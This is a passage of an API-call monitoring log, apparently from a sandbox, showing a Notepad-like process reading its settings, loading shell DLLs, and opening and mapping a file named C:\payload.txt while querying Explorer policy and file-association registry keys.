| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => lfPitchAndFamily Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 64 ValueName => lfFaceName Type => 16821052 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => iPointSize Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => fWrap Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => StatusBar Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => fSaveWindowPositions Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 80 ValueName => szHeader Type => 16819168 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 80 ValueName => szTrailer Type => 16819248 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => iMarginTop Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => iMarginBottom Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => iMarginLeft Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => iMarginRight Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => iWindowPosY Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => iWindowPosX Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => iWindowPosDX Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => iWindowPosDY Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW | Handle => 0x000000bc DataLength => 4 ValueName => fMLE_is_broken Type => 523672 | FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegCloseKey | Handle => 0x000000bc | SUCCESS | 0x00000000 | |
| 19:40:26,664 | 968 | GetSystemMetrics | SystemMetricIndex => 31 | SUCCESS | 0x00000019 | 10 times |
| 19:40:26,664 | 968 | LdrLoadDll | Flags => 521708 BaseAddress => 0x5ad70000 FileName => UxTheme.dll | SUCCESS | 0x00000000 | |
| 19:40:26,664 | 968 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => OpenThemeData FunctionAddress => 0x5ad773b8 ModuleHandle => 0x5ad70000 | SUCCESS | 0x00000000 | |
| 19:40:26,674 | 968 | GetSystemMetrics | SystemMetricIndex => 5 | SUCCESS | 0x00000001 | |
| 19:40:26,674 | 968 | GetSystemMetrics | SystemMetricIndex => 6 | SUCCESS | 0x00000001 | |
| 19:40:26,674 | 968 | GetSystemMetrics | SystemMetricIndex => 5 | SUCCESS | 0x00000001 | |
| 19:40:26,674 | 968 | GetSystemMetrics | SystemMetricIndex => 6 | SUCCESS | 0x00000001 | |
| 19:40:26,684 | 968 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => GetThemeTextMetrics FunctionAddress => 0x5ad8b293 ModuleHandle => 0x5ad70000 | SUCCESS | 0x00000000 | |
| 19:40:26,684 | 968 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => GetThemeBackgroundExtent FunctionAddress => 0x5ad8b1ad ModuleHandle => 0x5ad70000 | SUCCESS | 0x00000000 | |
| 19:40:26,684 | 968 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => GetThemeMargins FunctionAddress => 0x5ad7b0d2 ModuleHandle => 0x5ad70000 | SUCCESS | 0x00000000 | |
| 19:40:26,684 | 968 | GetSystemMetrics | SystemMetricIndex => 5 | SUCCESS | 0x00000001 | |
| 19:40:26,684 | 968 | GetSystemMetrics | SystemMetricIndex => 6 | SUCCESS | 0x00000001 | |
| 19:40:26,694 | 968 | GetSystemMetrics | SystemMetricIndex => 31 | SUCCESS | 0x00000019 | 31 times |
| 19:40:26,704 | 968 | GetSystemMetrics | SystemMetricIndex => 5 | SUCCESS | 0x00000001 | |
| 19:40:26,704 | 968 | GetSystemMetrics | SystemMetricIndex => 6 | SUCCESS | 0x00000001 | |
| 19:40:26,704 | 968 | FindFirstFileExW | FileName => C:\payload.txt | SUCCESS | 0x000bca68 | |
| 19:40:26,704 | 968 | NtCreateFile | ShareAccess => 3 FileName => C:\payload.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000000bc | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | NtQueryInformationFile | FileHandle => 0x000000bc FileInformation => \x10\xd8\x10?\xac\x9f\xd3\x01p\xe6\x13?\xac\x9f\xd3\x01p\xe6\x13?\xac\x9f\xd3\x01p\xe6\x13?\xac\x9f\xd3\x01 \x00\x00\x00\x00\x00\x00\x00\x88\x01\x00\x00\x00\x00\x00\x00\x82\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xae9\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x89\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\\x00p\x00 | FAILURE | 0x80000005 | |
| 19:40:26,704 | 968 | NtCreateSection | ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x000000c0 FileHandle => 0x000000bc | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | ZwMapViewOfSection | SectionOffset => 0x0007fb38 SectionHandle => 0x000000c0 ProcessHandle => 0xffffffff BaseAddress => 0x003c0000 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | FindFirstFileExW | FileName => C:\payload.txt | SUCCESS | 0x000bca68 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000c0 DataLength => 4 ValueName => NoNetHood Type => 517972 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000c0 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000c0 DataLength => 4 ValueName => NoPropertiesMyComputer Type => 517972 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000c0 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000c0 DataLength => 4 ValueName => NoInternetIcon Type => 517972 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000c0 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExA | Handle => 0x00000000 Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\NOTEPAD.EXE | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress | Ordinal => 236 FunctionName => FunctionAddress => 0x773e1798 ModuleHandle => 0x773d0000 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetDllHandle | ModuleHandle => 0x774e0000 FileName => OLE32.DLL | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrLoadDll | Flags => 517132 BaseAddress => 0x774e0000 FileName => ole32.dll | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => CoGetMalloc FunctionAddress => 0x774fdd08 ModuleHandle => 0x774e0000 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000c0 DataLength => 4 ValueName => NoCommonGroups Type => 517972 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000c0 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => CreateBindCtx FunctionAddress => 0x774fe54c ModuleHandle => 0x774e0000 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExA | Handle => 0x00000000 Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D} | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000c0 DataLength => 4 ValueName => NoControlPanel Type => 516328 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000c0 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000c0 DataLength => 4 ValueName => NoSetFolders Type => 516328 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000c0 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExA | Handle => 0x000000c6 Registry => 0x80000000 SubKey => CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000c6 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00S\x00H\x00E\x00L\x00L\x003\x002\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrLoadDll | Flags => 516908 BaseAddress => 0x7c9c0000 FileName => C:\WINDOWS\system32\SHELL32.dll | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000c6 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000c6 Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegEnumKeyW | Handle => 0x000000c6 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 0 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000ca Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9} | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000ca Data => 32 ValueName => DriveMask | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000ca | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegEnumKeyW | Handle => 0x000000c6 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 1 | FAILURE | 0x00000103 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000c6 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000c4 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000c4 DataLength => 4 ValueName => AllowFileCLSIDJunctions Type => 515164 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000c4 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrLoadDll | Flags => 517232 BaseAddress => 0x7c9c0000 FileName => SHELL32.dll | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress | Ordinal => 102 FunctionName => FunctionAddress => 0x7c9ef5e2 ModuleHandle => 0x7c9c0000 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrLoadDll | Flags => 517272 BaseAddress => 0x774e0000 FileName => ole32.dll | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => CoTaskMemAlloc FunctionAddress => 0x774fd060 ModuleHandle => 0x774e0000 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress | Ordinal => 320 FunctionName => FunctionAddress => 0x773e0a75 ModuleHandle => 0x773d0000 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress | Ordinal => 324 FunctionName => FunctionAddress => 0x773e0c22 ModuleHandle => 0x773d0000 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress | Ordinal => 323 FunctionName => FunctionAddress => 0x773e0b17 ModuleHandle => 0x773d0000 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000c6 Registry => 0x80000000 SubKey => Directory | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000000c6 SubKey => CurVer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000ca Registry => 0x000000c6 SubKey => | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000c6 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000c4 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000c4 DataLength => 4 ValueName => DontShowSuperHidden Type => 516936 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000c4 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000c4 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000cc Registry => 0x000000c4 SubKey => | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc DataLength => 36 ValueName => ShellState Type => 3 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc Data => ValueName => ShellState | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000cc | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc DataLength => 4 ValueName => ForceActiveDesktopOn Type => 516268 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000cc | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc DataLength => 4 ValueName => NoActiveDesktop Type => 516264 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000cc | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | GetSystemMetrics | SystemMetricIndex => 4096 | SUCCESS | 0x00000000 | 1 time |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\System | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | GetSystemMetrics | SystemMetricIndex => 4096 | SUCCESS | 0x00000000 | 1 time |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc DataLength => 4 ValueName => NoWebView Type => 516268 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000cc | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc DataLength => 4 ValueName => ClassicShell Type => 516268 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000cc | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc DataLength => 4 ValueName => SeparateProcess Type => 516268 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000cc | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc DataLength => 4 ValueName => NoNetCrawling Type => 516268 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000cc | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc DataLength => 4 ValueName => NoSimpleStartMenu Type => 516268 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000cc | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000cc Registry => 0x000000c4 SubKey => Advanced | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc Data => 2 ValueName => Hidden | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc Data => 1 ValueName => ShowCompColor | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc Data => 1 ValueName => HideFileExt | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc Data => 0 ValueName => DontPrettyPath | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc Data => 1 ValueName => ShowInfoTip | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc Data => 0 ValueName => HideIcons | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc Data => 0 ValueName => MapNetDrvBtn | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc Data => 1 ValueName => WebView | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc Data => 0 ValueName => Filter | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc DataLength => 4 ValueName => ShowSuperHidden Type => 517436 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc Data => 0 ValueName => SeparateProcess | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000cc DataLength => 4 ValueName => NoNetCrawling Type => 517436 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000cc | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000000ca SubKey => ShellEx\IconHandler | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000ca DataLength => 0 ValueName => DocObject Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000ca DataLength => 0 ValueName => BrowseInPlace Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000000ca SubKey => Clsid | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000d2 Registry => 0x80000000 SubKey => Folder | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000000d2 SubKey => Clsid | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000ca DataLength => 0 ValueName => IsShortcut Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000ca DataLength => 2 ValueName => AlwaysShowExt Type => 1 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000ca DataLength => 0 ValueName => NeverShowExt Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress | Ordinal => 388 FunctionName => FunctionAddress => 0x773e1535 ModuleHandle => 0x773d0000 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000ca | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000d2 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => CoTaskMemFree FunctionAddress => 0x774fd044 ModuleHandle => 0x774e0000 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCreateKeyExW | Handle => 0x000000c8 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000c8 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00R\x00e\x00c\x00e\x00n\x00t\x00\x00\x00 ValueName => Recent | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000c8 Registry => 0x000000c4 SubKey => FileExts | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000d4 Registry => 0x000000c8 SubKey => .txt | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000d4 DataLength => 128 ValueName => Progid Type => 515596 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000d4 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000d4 Registry => 0x000000c8 SubKey => .txt | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000d4 DataLength => 128 ValueName => Application Type => 515596 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000d4 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress | Ordinal => 326 FunctionName => FunctionAddress => 0x773e0cc1 ModuleHandle => 0x773d0000 | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000d6 Registry => 0x80000000 SubKey => .txt | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000d6 Data => t\x00x\x00t\x00f\x00i\x00l\x00e\x00\x00\x00 ValueName => | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000da Registry => 0x80000000 SubKey => txtfile | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000000da SubKey => CurVer | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000de Registry => 0x000000da SubKey => | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000da | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => CoTaskMemFree FunctionAddress => 0x774fd044 ModuleHandle => 0x774e0000 | SUCCESS | 0x00000000 | |
